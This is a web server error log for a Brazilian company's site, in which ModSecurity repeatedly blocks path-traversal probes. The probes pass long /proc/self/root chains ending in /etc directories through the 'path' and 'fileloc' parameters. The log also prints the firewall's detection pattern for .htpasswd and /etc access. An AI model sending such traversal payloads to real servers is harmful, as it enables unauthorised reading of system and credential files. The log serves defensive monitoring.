[Thu Mar 19 13:41:36.583003 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.241.31:43676] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwnQMdf6f5d65gmYZSPDwAAAsg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:41:48.631148 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.241.31:39964] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwnTOoXxyEfFpUF8f8iYgAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:41:59.125808 2026] [proxy_fcgi:error] [pid 27403:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:50868] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:41:59.249816 2026] [core:alert] [pid 30077:tid 140411741927168] [client 57.141.18.108:55758] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 13:41:59.250090 2026] [core:alert] [pid 14269:tid 140411733534464] [client 74.7.243.128:48464] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/opt
[Thu Mar 19 13:42:02.363308 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.228.61:51394] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwnWuyqAr6etmhZHNp1bwAAAEU"]
[Thu Mar 19 13:42:11.160802 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.241.31:44610] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwnY9a6ubjKNq_cu4ZsqgAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:42:16.091085 2026] [:error] [pid 14269:tid 140411632822016] [client 74.7.241.31:53400] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwnaAbLMZ6AikZjR9VzGAAAAA0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:42:16.349974 2026] [:error] [pid 14269:tid 140411548894976] [client 74.7.241.31:53400] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwnaAbLMZ6AikZjR9VzGQAAABc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:42:20.457957 2026] [:error] [pid 14269:tid 140411599251200] [client 74.7.241.31:45822] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwnbAbLMZ6AikZjR9VzHwAAABE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:42:25.145486 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.241.31:45826] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwncda6ubjKNq_cu4ZstQAAA00"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:42:27.515849 2026] [:error] [pid 17653:tid 140411548894976] [client 74.7.241.31:55950] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwnc8df6f5d65gmYZSPKgAAAtc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:42:30.113867 2026] [proxy_fcgi:error] [pid 19093:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:51968] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:42:35.866097 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.244.43:45486] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwne8df6f5d65gmYZSPOQAAAtA"]
[Thu Mar 19 13:42:47.915436 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.241.31:55958] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwnh8df6f5d65gmYZSPQwAAAtA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:43:00.133782 2026] [proxy_fcgi:error] [pid 19093:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:52930] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:43:01.259383 2026] [:error] [pid 27403:tid 140411557287680] [client 74.7.241.31:46848] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwnlRkFeYa1D6dYQnAHPQAAAdY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:43:26.125872 2026] [proxy_fcgi:error] [pid 27293:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:53848] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:43:41.387869 2026] [mime_magic:error] [pid 17887:tid 140411624429312] (70014)End of file found: [client 57.141.18.33:59184] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 13:43:42.479047 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.241.31:59114] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwnvgkwaGbbGflqUZDezgAAANU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:43:52.105828 2026] [proxy_fcgi:error] [pid 14269:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:54648] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:43:59.011345 2026] [mime_magic:error] [pid 26799:tid 140411699963648] (70014)End of file found: [client 57.141.18.48:59430] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 13:44:16.138902 2026] [proxy_fcgi:error] [pid 30077:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:55488] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:44:38.145885 2026] [proxy_fcgi:error] [pid 27293:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:56262] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:45:00.153775 2026] [proxy_fcgi:error] [pid 17887:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:56910] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:45:14.139510 2026] [:error] [pid 27293:tid 140411725141760] [client 74.7.243.128:48058] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwoGv-YZRR_7pZ7nDKhiwAAA8I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:45:23.147111 2026] [proxy_fcgi:error] [pid 26799:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:57542] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:45:36.808271 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.241.31:53486] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwoMMdf6f5d65gmYZSPwgAAAsc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:45:38.114426 2026] [core:alert] [pid 26799:tid 140411632822016] [client 57.141.18.7:34744] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 13:45:40.949156 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.241.31:59216] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dir_colors.lightbgcolor"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwoNAkwaGbbGflqUZDfGAAAAM4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:45:43.106560 2026] [mime_magic:error] [pid 19093:tid 140411716749056] (70014)End of file found: [client 57.141.18.11:34576] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 13:45:44.894852 2026] [:error] [pid 19093:tid 140411674785536] [client 74.7.241.31:59220] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/.pwd.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwoOF_V7PWP6ixUYl7TFAAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:45:54.033863 2026] [proxy_fcgi:error] [pid 17887:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:58598] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:45:55.005882 2026] [:error] [pid 19093:tid 140411666392832] [client 74.7.241.31:59220] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwoQ1_V7PWP6ixUYl7TKQAAAok"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:45:55.657139 2026] [:error] [pid 27403:tid 140411574073088] [client 74.7.243.128:46390] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwoQxkFeYa1D6dYQnAHuQAAAdQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:45:56.651566 2026] [:error] [pid 27293:tid 140411624429312] [client 74.7.241.31:45106] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwoRP-YZRR_7pZ7nDKhoQAAA84"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
